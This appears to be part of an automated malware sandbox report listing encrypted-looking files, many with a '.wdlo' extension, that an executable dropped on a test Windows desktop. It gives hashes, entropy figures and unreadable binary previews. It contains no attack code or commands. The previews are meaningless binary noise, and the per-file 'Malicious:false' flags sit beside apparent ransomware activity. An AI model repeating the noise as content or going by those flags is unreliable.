                  Preview:UCKFK".Z.V........TJBT%.............g...'..B...q.JuI..6...s-iE..`ogf.y^.C.^x..BNU.R%.f..l..O.8).-P4\..t...J...gm.....fJ6.,.O+XX......E..^/....7.rc...._..].Nv...D7Y,..<q@..[h...)......%9.C...g.3.)...G...V.8b......=G...k......R.5 .[kwm...sy.E..].pM...J..v.`..=.kO.3.QE.......M6{).~..RM&..&..~................SM..../..j..OUi5.x"....g..$...j...~...@"]..9.....9....[..M.O.t.V.i..be...z.`.*%..8.....w....'....!{........'6U:N.m...J..s$Fh.@h[....A..s..[.....E~b:..$....(.v+...~.bL8...G.6(_.X.P..E..=g].5l<?.....>..........(..f.ecf..r.... ..{.......%.)..1...^..+@.8...l.....?>_..6..XK.2v....]$........7..Z"...<...6..|..pw.#.h..8...I..i.Rk..9....~.n.G.j~*..+.c.]...).............u%T*..d...l.%.yw...V\....G...q$.X.I..d..b;.O.P.t....0..D{.....Fo.._Uo.&........)..^......l.rot]3@.....Y../PL...2s.%p..h....|.....f&=..g.....n..-..B.U..h..j.`.=..Q...x...J.t...._......cHL..U_..:FibU..S.........4....w.;,a1E_.Ft.....B.|s.q.Z....po...I...q.|g.\w..0z.w...:t.j

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\UNKRLCVOHV.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.829489198081417
                  Encrypted:false
                  SSDEEP:24:UeKg9vwyxuqfV+HkiqH1Wal2qWeachRB8mT6TdnOr3nmX3Lr3zbD:dKSxJd+EijnyRB8ae9ynmX3Lr3nD
                  MD5:FFA91C33938904717A98C2FB44BD307B
                  SHA1:0FFF238F91F6B2EDC060492183568396B564CE46
                  SHA-256:4051629D6C3406D6B96A74D201F0F76DB8498E3BC1994C386FBA7FDF0474660C
                  SHA-512:83E59598EA144BDCD11D7E2BE2927DC707D5EC42343003BCF89CB7EEAFF479F0A67366A3ED6772A4E520ECCA7A127C582E93BB1FA505D1209154FC105AED6DDD
                  Malicious:false
                  Preview:UNKRL.:...{D=S......_..z....e.N.d.e.J-. ..G.#..G..@....].vB;...c.F.....Pz....<.7.B.jQ..i..W.17...F..XG....2.E....=&..o....>/@.v4.%D...`....C..(.v#y....<....E........SA...g@=...$....6.b..0.d:...(.{.o}.o.^OX.A.........O.1-.DF..j.:.c.#,..6P4...f.cTU...?.....7.......Y....1.Uu.(..q(...>m..f ...~}9.Y^...=....2.}5.n.`........l...v~.o....?Y.L...Fwq.....FP..u....6n.uin-Y...nQ........[..!d..A8.$amA.Q..Z)._3.".-~.(w..W......t...vKF.a........M*g..d...w..K.~...IP..8..F.....IB....$.]w)..2|o..7t.Ip.e.;..u.;8...P...Dz.2[.".Dp...a...............3H7.R....@....._t.tC t......q....t..xia[gO...FR{T.P.E....:.u{....~o.R.....*G..4d.~...=i<?....S.Fp..q.\p...........eWL...(-..E...N.q.(..1..(.*.hU... Ut....8.f\.;..A.>n.F.5..b..f:.....L...?.0.u...X.J..urMV.lE..g..e...x-`./....In..e..O..R....t.. .../Da.._."&...t..p.....\iEX..v....6...u..Q)..L....i.Fz..._..R(.Q5...@"...I8..9...tM.v.I..n...&.y^...].S.xhv=......AF.....A..Zt..._BUr..t...D..|.[9...._.c...Iy.w...t..^P(...%V....

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\UNKRLCVOHV.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.849848736245404
                  Encrypted:false
                  SSDEEP:24:2+tUMi6ixXNISOYq1uEoa/fOAqPt/G4HYHDMEjAgUhJ0jvIgtAXFtNjDOZHGKGYe:F2xXjOHNXfqF/G4uD/jAgmCjvIgtAXRZ
                  MD5:D765D5D383651E67028E132A8746A98A
                  SHA1:A3AA96CCFA408D7BFDB2D6261494B82FAD8520F6
                  SHA-256:D8815DE21FDFEFBB9CCB9B7BC40DCD47B0AE43619F5B97FCF922DB31204552C0
                  SHA-512:B27169EDE67019AD0571E946B3E490130444ECDF6846F15D1F0F584A5E52931FA61D7288D0F2342155D4571567B198A86E6E0236A87460CDC05EA52EFDDAAE78
                  Malicious:false
                  Preview:UNKRL.b......x.lnT.D..#.v.......C.y.....&h......Njl.p$ |....|.%.>R3...D3...6.D..?...'..Z..5......[...ly..YS.d.I.WA=...c.Lw~..R9}T...lm...a..lT.....E=...Q$<@fD..)......}p..1.M[.O.0..6.w........+..4........?.....~b.o.#...[..h.j.X...9$.i....._>.1....[..PAB...4=......h..L.E....=..q.\.h.P)n....q..K....Q.....R...3.!r..V.{......HS-..[........=.....S...X#.$....jMr.[....."../ZA.!.0.k.3O|...wj;+.....E.l..;..s....1T}....p..,...|.:a......T....W..#........K..g..g?..2q..^.m.<....z\.8*j..x@..cPS..k.C.dy.6..B..x.....?=.!.....=..g.-.T...k).b.lgz2./.s~.Ym...?.e..,....+..t....5..-_.X}T.I.....7......B.H..~...%4..5.Gc..".?..G...%)..]zL....K.".v%.:..6z.6m....%~..3#8.m......8.>.j...e.._3....{....\..R#.......Z...Q.m...!2..{...(...QzMW.,.q..;.@I.r.:..E(.....fZ.k..(c.m.g.p._t........p...3.V.;.".\6U..+..C...@...n.s.nr..I.d.%...%.....^F.]. N.......V}X-...3..b.R...{.;..x..6..|....(v..<.I......K8?. I$7..J.W@..[j@......GK.).7..]tS.XG...].0.o4Q...6...S...a~N.....hq:d

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\UUVPAKSIRG.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:VISX image file
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8336544381718
                  Encrypted:false
                  SSDEEP:24:6rpoqsN0c6gcT1fgfGaWNXWz9rgcUDToPx2vUylzTkdjiQwY/L/Mzx43zbD:6doqU0Lg64qAz9rgPDTwaUyTwOQwYD/B
                  MD5:9BB00DAA9CBC0ADB40C3AED86F7264EF
                  SHA1:BBA5A6D82CBFAE6D9E28474868EB4AD7F91367F5
                  SHA-256:43E2FFD053699547C7E0FD8F444D49746FC1579DF3D9085619AF7F6FAA40553A
                  SHA-512:7031A4B83EA09A0A66F9A5117ACDC7B5B1E417D00821C35B72E2C01EFBA7C0A1B04F27C53DA7CFD7CE171FC6FEA74DD5703899C6C8B0CEB4FFD7CB0B2248D707
                  Malicious:false
                  Preview:UUVPA.D.AC..g._.M..E.N.2U..I.#..T.9.bv.E.B....r.2..*..\.k...$i\f.].6.X..l.....d........5.........P..g.M...s$...W.....58.x..##.%)..&^....k^}IT.J...^.v..KIn..c....m.L...7......{.,..|....%..(CD)u.....]~......wl....#.:.......p.+q..j.tv...@.zu.....*.82.idR2..i....'i..1..Te.l......sb.6..8.'g.V.H.A;b>.|N.G].6.3"-#...............D.b(...8..5\X..l.s..b..x..o..r.W.5..q!.....m.........:.W.eF..,.X3.l.z.....^...m...y`I.@.e..m.........0."&..G\)..Y.*z;9.C...|.#.ny...sb.F.&.........&...9..%%gv;.IU...2A.C.E.YF......P.x....)D....&}.?......4......6M.5...xfz..<a.[...u.UoE.X}....B.........PD..9y.I.....v|.6....q].C#}K...v1..%...J.&l...f........we..-...'...6g....$...U.t.|..%P....O6..{. ..5<..6`..Q...NH..uCI..;.LEv.B..;]....wH..9..." ...........t......]...d.p..'...l....NT.....>..i.^."\....a`F.....O....f9...o..X...!w...'r[.'5.*...Z.7.'...g..2.>7C.....H.......a....x....q.i.#..5..[.a.>n.ut..}........<..l..@...F..........'...$.v...k.....+..Xp..FII........?O.Q.._SX....

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\WHZAGPPPLA.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.835977069125858
                  Encrypted:false
                  SSDEEP:24:qAlh+oCa+GXlvRkZ5YlyWjr6U2iU42WJYJvBrXsTguF4MzW4eiIRPsCV5i3zbD:jhS9GXlvRC5YlyWjei3yvBbSh4M52RP4
                  MD5:AAD063F9E438F44D75E156525F56957D
                  SHA1:0D424832A526E22E941C9406CD2A34791B283A79
                  SHA-256:5C9DA6809E3E0119EA3928E5770DEB6FC01AF6B287E26F4318ED85A104752917
                  SHA-512:BB1DAE3517A10E416C3CFEE86D7CABF1C31708A1EB79FCACE4CEA6123F42AF32B847FA8303A822B788A5AC77C7033AF813909A4D81F8BE96190912CF31E89D1D
                  Malicious:false
                  Preview:WHZAG..e.x'Co.....z.....lPrr..>o,^.1.{..5=...?.&.J..k,.+wR.?C....:V\p..I...D...!#...%...nGC.eS..i...B...9...Kz41..n.@.t...T.QJ"|,=.@...S.w..........M5......Pl.p......x..i.|.N...0....k..|&.........2D>Rc...I.OQV.w*..L...K.;._.....hmJ.......a".m..pCZ.`..0.q&......._w.V"....0&...gvr.-...,g.`.f..>.a.f..Y....6.rl..n....5@..RlDY.......U....I...=...5..1~..=......*m.^.r.F..7.x....6..{7..JN..[..p....z.D./1t.N....3.o...<?.......m.&...!...qm=..9v.........8..Y6Rk..YE.6.qJ.z...>.....Jgi.tO}.@vq.#..=f........a8";..h..g.C.h".e~Al.....!.x1{.|..9..k........._V@6...=...TP..*.1s.J.A>.m..zb..) m.B...........qy}1.'a.gB.Y....u.&-.IB.M/..EM.....z<..H..v..........L....ug.?..|0.o./.Ha.......ye......b.s.....THh..f...xJ.t'..M.2...`.-.P}.. .{.qr...k.M...j...1.....W...1.-.r.W....}Z..#.....ki..A.0.0.e#.F..3...D<....*M.e..`q...P..q[..H8~e.m.Q.F..~8....s'....\...D......m....U..O...:\..t...+\.}l......z..3..C...RM......N9...1..{.K7k.;.n_#..!..&...|"}..$.i&.......:\:. [...._.

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\WSHEJMDVQC.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.851361929921755
                  Encrypted:false
                  SSDEEP:24:XME+KEs4L8LP34BF7XD5EiL7wJjfAdUWakKQTTvdhNnaZeJT/+3zbD:jJEML34F7dEif0IHaXQfvXNa4+3nD
                  MD5:70B804B488DC61280B604011915092C0
                  SHA1:E9DB2E4093D08A2FDA884A9752336E888E124069
                  SHA-256:74BCDAD517083D60114321DCA0C6215C29BEFE046889124215D9161DF7A76AE0
                  SHA-512:A253CAB01D94D209E589776DA37C9E6679E81FC1AA9F64638716C3A3A0B43DA9C93C23348FCD38C1F24E03050B12CE6A88C9B4DB77C6E54C49C69C35CA79ADB8
                  Malicious:false
                  Preview:WSHEJ......-..Hg..!.....u...._.X...e.j"sz....M....l...7.....a.p<5.)........]..E..6h..zw....u.C...../.Mx"...F._..cO...G.tX......q.".n..1..=..va....M2.....62.`...9J.'.;l...7.o..Q....zC.^^.)L..J.{..gf..x.m'rlG..V0=.....I.......+?>...v....~..,W.z...@...*/ .T../.+m....Z.nf.N.[.Q..(..v...u#.......p.Z.....a..OHE....?..@..`x..#}#........yi9.I.g.#...O.`P........0....w....\...x3.^..lG1..,.OX.f?;8....{@...y.,....L.!.=G`..mz..7mG.....A.8..U..2..`.k.NR{.;.J...cNu......5.u/|..rUP..sb...A.@3..~...\..w..:.QyA.C......,a.W...nS.u..x,.uE.L.e..O[j...{%dq'.....{..LU.V..X...HO....~.......F!..T.lif...k..lxI.-Sh1.....M....6.-. (@..........B.H..s.z2M.K.@tlF.D^..9.Kx.....NNp...c1l7..s.NM.....i...*.A....=C.#/..G_....gc.r.!....w...`.!...HoQ...3...[....=c...z..F|.HD2.U..p.....D...,...w.. .G.$..Z.1...g..um.8.2...:...S......Y..a.......?....1_...0. ..........'..S.|&O6.a.[.|...@..P...0.....D..+...!..N.....J.........o..h>...we.h.....Xf6...M.g)q..W...[:..9.....T.

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\WSHEJMDVQC.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.858835963246804
                  Encrypted:false
                  SSDEEP:24:fwYWNnMCw+nm79adQnKhgank4zKvbhDKe9IOY5y6pbVcpHDR07q7Gk03zbD:ZyMCzm79cuKSAaZtMO1R07q7Gk03nD
                  MD5:9E371AAD92236B5A3EBE840E9C8BFE3F
                  SHA1:89E7536476896821B69E8C2CD5E11C50F6F2D1A6
                  SHA-256:3CCFC8421DEC82D8C22409A9EC01BA9990B3A46701B1ED747FD46FA552C8980F
                  SHA-512:A8C8C598DC71501813BA89705740FDF9A12E3024E7ED5A578832EF3D1623FD9B1C5AF02CA93BDF7866CE9C24B5FAAB3AF3C49FFA675C2EC01F7860FD650C2F9B
                  Malicious:false
                  Preview:WSHEJ.".j.r...W...c9......<....?.}.....=.l.v....i....cX......j..M..V....J...gt6........'..v....r2..>y8..D.6.ML3..(.Z[J...s2.R.Z...h..jn.... .1.!r+................2.-U8.-].....,Oc!.}..f.3.%:{k./u...".k..h.hK..6..dPz.N.q....V.F ..N.4?O8.0`.5...S.$.2.Z...4.<+A.d...80......W.......~.|..J.>..I.a.t..xi.a.XO.....})...9}.....L......s.y|..is..v.A.n...Vh.<....4.;....)3....?.....+...\.........x.I..fp...'K]>)..........>.h......i.Am.J5i;..f..F.C...-...... /.s}XX.Rg..&........oc.wl{..2.\...u..>6.u&..2u....^...R.....1._.z>...v2.6..j....Q...#........{..l..U._.qB..Q5.......9..5..c..1i..~..Zkhe.!.M.m..W;.Y.2"`A..H.].WM........]....2.@m3...J../9].E...z\Q.wF}}6=.......\Ytt,.Z.....x...wp....In.Gp.H....}z.R.$5...ad#.Y..6h.?....0..u....Z.NE..f`.........vW...0...j....WZL..t...2q....6..!..np....&5U..EM. @...eo.7...bU..Z.f.......#... .)E,?.....*(..@.~....s$$.y.....x........>...^..}...e.oO...i..i.q......B..<.%..=[h........M..K..9.;...@@.j...].l....>A&.C./..$...g.,.i/..^

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\YYTXSGEDYK.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.877186762889906
                  Encrypted:false
                  SSDEEP:24:GwlCHFdTWElNH1Cl/1fAL5+qbLUr4H/WdYfR7l/EfngDrEcrSC3zbD:GweFd3HE/nkLU8H/WifRBGqx3nD
                  MD5:20DAE14096F3D2047A8BE50B7C6CE636
                  SHA1:4F3DBAAF107B4C3A6B17A2AB12812BCB28D74399
                  SHA-256:7A91B0AD0464352371AC1CB59591E3E561AD476BB8655B2FF0C8C8C3B3B0EA93
                  SHA-512:87A508E94794FFC027CF37880F1FE531D3D79C2FDF9E16EAB4EBFB0B7ED70EEB07D9FD02DA82FF5B0FE12CEC0FFE60E3CAC8C8F7750FD19E0958EE8E46D7551B
                  Malicious:false
                  Preview:YYTXS...........2....%77..$2.......[7...tW...&.$g.[...9i...O..#.p.]...]^.UIE...F*....\^s..SBQ.."Y.u.1.;9n.......IOg....4B..cp.....6.\...}.b...r...`....;....^..%....Q.(...l....-..JGa....(.LL.M&Iv.#.Y....t.__/.g.o0........ygIH.RH.7R.*z...'.-...O.:..X.&..o.N0..%S.VR..l.w...N.!.K...........2..~..rK..|..@b.......Ndp.2~C.=.H.M._...'u....p..........*...kuFT...$..|.Ld0d..r.jEm..1..8[..iC8..P(Ww..m.."..y._....*5..y,.......]..wf.$.!@.......10.G._..Z.3e. ......v?.D.e]o.s_0&Ls\$!......#Y.D..G..........q).*+a.D!..\7....K?)J............!G.O........#....^.......|.[...bn...NAx...{..yP.;..Jy..5[.....}cj..q...g....'=%..&}.C.r..i.....g...o.e.pZ.^+.@_.%....N.,Zq...5...........;...g.....Vu.5...jay.~..{,..?..,.Te...S.a.i.Q..dW..i....3?....T.CCo={..O(...5&..H.p.&..:.)?*<..... .J...ETE..%....,..Fag.........F.S.B|..'..w......f5H.............L..O. .....8.1..}...\^.B~2...sj.r........[...~.<..(~..E.......... hU..V.F.m.v.e.}r:.....l.....<...z.z.i!..@bw....

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\YYTXSGEDYK.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.840715736693536
                  Encrypted:false
                  SSDEEP:24:U/BkZhdFOx+FlNhUaGwz132bXptORVyf716kZ0Dc8C+l+L1v1wZ/fv/F/VoK804Z:ykTdFOehUfwz1UO/yD16k05Avs3N/Vo3
                  MD5:1A8224F16E3BDF07E80634563B6D2137
                  SHA1:C22CF1D0EDB12EE61F294A44852154CACF590FD1
                  SHA-256:42736ABF5806CADF8605C0991718E9460346D2C56768ABAF830D9A6BB442DDAA
                  SHA-512:ABA8ACF3B3DB81A7DBDB883ABE3A7B115807CCD4000A6124B1C579A5CA423A729C2557B85FC0910A28D4EFA19071C51E38C59A20E6742B1092B6C2CFC19F2D2F
                  Malicious:false
                  Preview:YYTXS..../|>.9ok...Z..g.}..i.."L....Y...:.`..$cs..3...A..6K....E..?...,...s....*..c.q.3..."........vV9.A..5..-u7k.G...Bv....M....n.4...6f..m.J......((..4.[..M-...pOeBO...%.t.`I ....c.......M.l....K.23m`F........<?r.=...h...3.R.g.....k..K....0.....gE..m.$%{.5..X..1.\7[.8!.G.S..v..@..6..s...S......L...u......Ep'z.3@.*. .[v.I#.5....l..._N......k.A....[..{.T.H...s..-i..k....o.q._........c..T..7..ce.C.|$)w.......c.......Q..|).3...@.`l..r.v....c..... n8...{..w..XU..J5.0.._.L...+....V<y..#..8....*.c...@.q.$s....w.#....$V.v.}*.....VS?...{R.n&K..a.(.$..U.....i...\.{p.*.E.8..qh&.4.........g...4)...H.]..=.....Q.j._.&..._.H6...\.T...A.5..........;.,.EJ.5...r..N(......D.k.....T<....%o_`&.M.e.....(B;.Y..DK.G........4.m..W..F..3+....-{`Q.*.sVi..'..D...&..>8E..M.n0...=n...t..x.u..^O..4Z....W.c.V...crm....C.'...1..V.C...^gZ.W*3...Q.q.yv!.G.\{.f.a|e.$...2.....]X.MvPl......;.K......%GB.(F....=...f.&lF..R..z7.."e...#..:.K.x..o...2.....r.X.x....+......1'...v\...C.o.

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\ZYXFLCGPAD.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.852460523692268
                  Encrypted:false
                  SSDEEP:24:rZUQrBOjtgk2a68r3mjpw+I2bO81AFuoyxkhkG/OrY/FSYScXeBK0Zp2K3Dadc3D:r253mjBFOvuoyprYsYScI/ptN3nD
                  MD5:2687DEB0128150B3840C53BDF8BBB0CF
                  SHA1:010ABED6C15F305D646A627E08A65190AE19575F
                  SHA-256:8CF0B64E35A026725D1EF9E2C2CFBA2516FF88AAAAF4222DE24D30BD519FFD16
                  SHA-512:E23797EDFE02CA55F726B6EDB4014BC001B705001633743FF7B02DBDB7E77C26FA2A20DE2FA34B4A335B3B477205E8781717E14DE51D192D7B4ABFA2FF4DD93B
                  Malicious:false
                  Preview:ZYXFL.w(.K.Y....^|nG...9J....L^......1.......Es........l...Y..:Pc........R..".U0R]q...k.;........%...}..].r..9..um..v^.........8E.......k...~..<*l..P)g.......=O0....L...R....z<]...`,.m5..P.......}!..S.na..X.5.P..>y...y<.q....9.#.G3.6$........T .xX0...s:...e.&..g.f.q..p.qe........"*@..J.;:f...f.......e....;.......e... ....tnP..../..}.`..#=4......Ze....9..o.<+..n`.8..3G.7...\d. hE.z-.;.`.._h.%...Y.j..6....,".s...#YT..%Q....o.(6...s.2..O...hA...@..SIrm...z@....x.V.<]..O18+..op!...7..w"...`..D.L..V<..D...*......i..i}.Y.....X.....Q.}L|..+..........!..|.l.Nuw.S..BO....w..O\2b...5.1.d.O.6.%...+z.by.k...V...T..).J......j.Q....J.x.n...$.^..&....[.&..>K......0...k.U...2......7~...9p...7.-.Qi,.3$......T.....T.v.UMF}Y.GHl......\....K9.=..q.........2d.R..g..xf....0.d..'...TIU.#..j0W;.5.5...._q..[|s^]..MOW.....p.......w..X]:.qoc.....kg....B.4~}....3........4......_,.:...Q}.\.....B.7.RQP..CE*.....bF4^.}A....../".6............-:..O..nk.....@{.'.m[<D..../..

                  C:\Users\user\Desktop\AQRFEVRTGL.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8301432884887845
                  Encrypted:false
                  SSDEEP:24:VSdc+lYNCaN1mOB1IURSEZ4847+Odvw7UqjDLkbeDRrcI7e5q7zKIATekSgNgGbA:VealN1mOBRRSEZ48473do7H6I7eKzKIz
                  MD5:A86E59D68FC7912F30DCCFFA7025DB91
                  SHA1:3EC963F40FD44AB2F9BFF7BC96BF7EE633844648
                  SHA-256:3C0C0B866A2C9339A52885BF246DD994CD0649CF54AFC9D257B1410F8976979E
                  SHA-512:A933DB8274BA6DF66CA9AC4C8BF20F91ABA57EA9CBC42D03B5B347D5E217D50CD1BDE93161837F000D1D4BA5995E9F0F44A960552F1E27E5AA6A6D6D4E4A9511
                  Malicious:false
                  Preview:AQRFE......b.v.F......|ac.i6b..{V.`V.h.3.4,...'.....OEw.... z..:..A..p3x......IA9j.......p.,..a#A...[k=.}.v.....v.;u..*..B.......S....]W!...X. .?.j]...a&.L.Y..w..I/..D.e.7..o.p...b..[...Z..."..x>Z.9..X...v!.l5e.`....QUhv^..{.G....Y.\./.i........-KK]...O.#Oww...B...#c..t..~.......?T..Q.,..2R../V..$.j=.74v......,.s....P'....b...y..)I...QE0$$.i..|.....2....g..st..n.....0x...C62.....{..x..f.G.=.6x.<Tq.h..f_...:.r.Q<.!....A.K..=.mc.Q.$.6..Q.....jDe.C...H*$.y..A..Z<...<..\.b..Q.[+f..O.,C.$...:v.f..4.u...p-..d..2.X.9.p..;.x/k.......8.g`.h5..@&Ji's.-i.....k.c`../g........q...9....p...f6u.....m...>.......7....J....myJ...aT..T..H.x....`.9.......>.....!.I<)vW..ux4%...>l......p.[A.~.>..V*.e....4S&...M.Hs...X.....?(.D..H[....C.'.g_6[.g...wt....-T.........."..~N.....U.v.a.@.K...{.)....../I.>....l'6...{.....E..E..%Y.*.....}....c...A.+@9y.F.;..{..D...k.,.q3.M....s..X.v.s..IP6.@.w}PT|..\.p.%.-.^.R$j..o..........Dr.._...`..:.....bv.B..q\,X.ex..Yz....+.K..

                  C:\Users\user\Desktop\AQRFEVRTGL.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8301432884887845
                  Encrypted:false
                  SSDEEP:24:VSdc+lYNCaN1mOB1IURSEZ4847+Odvw7UqjDLkbeDRrcI7e5q7zKIATekSgNgGbA:VealN1mOBRRSEZ48473do7H6I7eKzKIz
                  MD5:A86E59D68FC7912F30DCCFFA7025DB91
                  SHA1:3EC963F40FD44AB2F9BFF7BC96BF7EE633844648
                  SHA-256:3C0C0B866A2C9339A52885BF246DD994CD0649CF54AFC9D257B1410F8976979E
                  SHA-512:A933DB8274BA6DF66CA9AC4C8BF20F91ABA57EA9CBC42D03B5B347D5E217D50CD1BDE93161837F000D1D4BA5995E9F0F44A960552F1E27E5AA6A6D6D4E4A9511
                  Malicious:false
                  Preview:AQRFE......b.v.F......|ac.i6b..{V.`V.h.3.4,...'.....OEw.... z..:..A..p3x......IA9j.......p.,..a#A...[k=.}.v.....v.;u..*..B.......S....]W!...X. .?.j]...a&.L.Y..w..I/..D.e.7..o.p...b..[...Z..."..x>Z.9..X...v!.l5e.`....QUhv^..{.G....Y.\./.i........-KK]...O.#Oww...B...#c..t..~.......?T..Q.,..2R../V..$.j=.74v......,.s....P'....b...y..)I...QE0$$.i..|.....2....g..st..n.....0x...C62.....{..x..f.G.=.6x.<Tq.h..f_...:.r.Q<.!....A.K..=.mc.Q.$.6..Q.....jDe.C...H*$.y..A..Z<...<..\.b..Q.[+f..O.,C.$...:v.f..4.u...p-..d..2.X.9.p..;.x/k.......8.g`.h5..@&Ji's.-i.....k.c`../g........q...9....p...f6u.....m...>.......7....J....myJ...aT..T..H.x....`.9.......>.....!.I<)vW..ux4%...>l......p.[A.~.>..V*.e....4S&...M.Hs...X.....?(.D..H[....C.'.g_6[.g...wt....-T.........."..~N.....U.v.a.@.K...{.)....../I.>....l'6...{.....E..E..%Y.*.....}....c...A.+@9y.F.;..{..D...k.,.q3.M....s..X.v.s..IP6.@.w}PT|..\.p.%.-.^.R$j..o..........Dr.._...`..:.....bv.B..q\,X.ex..Yz....+.K..

                  C:\Users\user\Desktop\AQRFEVRTGL.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.843205455794113
                  Encrypted:false
                  SSDEEP:24:VDhvTt+aHMs52IZNSapySQm0n2VyCJfIwCb4SVPDVdOvEX8qNsr1ZpbNdu0cUQcT:V5ToafZIST02VDJMb4UVdAC83r1Zp5dR
                  MD5:5131BD1804F7E0F61387C3912E6E927F
                  SHA1:471194F446F0F56D01DBB8A4C7A6108F33ACE374
                  SHA-256:AB12203AE3FBC1F421F14AF9657AAEF822BC83677B1FCFFED1A6F4011ABDF302
                  SHA-512:35CAC7FB0D26541B94533801C4AD360484DA4E74448176035D961B6E0ECD70548E7C2629E11D6C2FC632B6001EA457A93327695FE7F8864062DF2424561D933F
                  Malicious:false
                  Preview:AQRFE.,..Q.`.S.....a...'.....%....U......".-....R.q...J^Z.a..M..!...m.s.A../P.~. A...m...Q.W...c.....:.SQ......sd~...hQ.f...`.H.<.3.. .N.^..<...f.o...!.2....yg{...nS.....H.Z....9z...WC...l0u*....v..*..L.8.(*..P.M.t..RKjlC....1..v../).t:."a.f.&.r.....&.@~.1...HD...@..r....eUU..S.j.@.Z.....0..'.{....y..N...</.w_..i!.K#.o-.......aw..a.....T.........LK.o.+cc...K+.....q.............g.......w.m.6X%....bg....]...;...._.m..1.4.....L9...1.....`~........z.....2........K.'z.fub.OYt.Z.An....h.GA1..re...7l.D.q..........c.w...X.4vPP.^.s.$.1J.b.#.A.b.>B....C]......Q._..b.r....".0.....&>..f.r04q.....U]5F.l.2I.M..............Ys......cK..a.{....]D.-.......{.qK.JB..A.t_'HN_......>...*..........d.a....i.sQd....v.....y..2T}c..%....kt...g.......%.,...N.B...H...f.]H......"..,N......IK....p...7..Fc..m....6...k....f]...a.o6-..B7.'.I...T..f..6s^..8.V..'.:.9m\..%9jL..4..........m.X.<.Ku.*.s.,(r....|g.w......R9jA.B....0.;{.".`N..H..Bub`!..B].N.......H...6.S>......LfY

                  C:\Users\user\Desktop\AQRFEVRTGL.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.843205455794113
                  Encrypted:false
                  SSDEEP:24:VDhvTt+aHMs52IZNSapySQm0n2VyCJfIwCb4SVPDVdOvEX8qNsr1ZpbNdu0cUQcT:V5ToafZIST02VDJMb4UVdAC83r1Zp5dR
                  MD5:5131BD1804F7E0F61387C3912E6E927F
                  SHA1:471194F446F0F56D01DBB8A4C7A6108F33ACE374
                  SHA-256:AB12203AE3FBC1F421F14AF9657AAEF822BC83677B1FCFFED1A6F4011ABDF302
                  SHA-512:35CAC7FB0D26541B94533801C4AD360484DA4E74448176035D961B6E0ECD70548E7C2629E11D6C2FC632B6001EA457A93327695FE7F8864062DF2424561D933F
                  Malicious:false
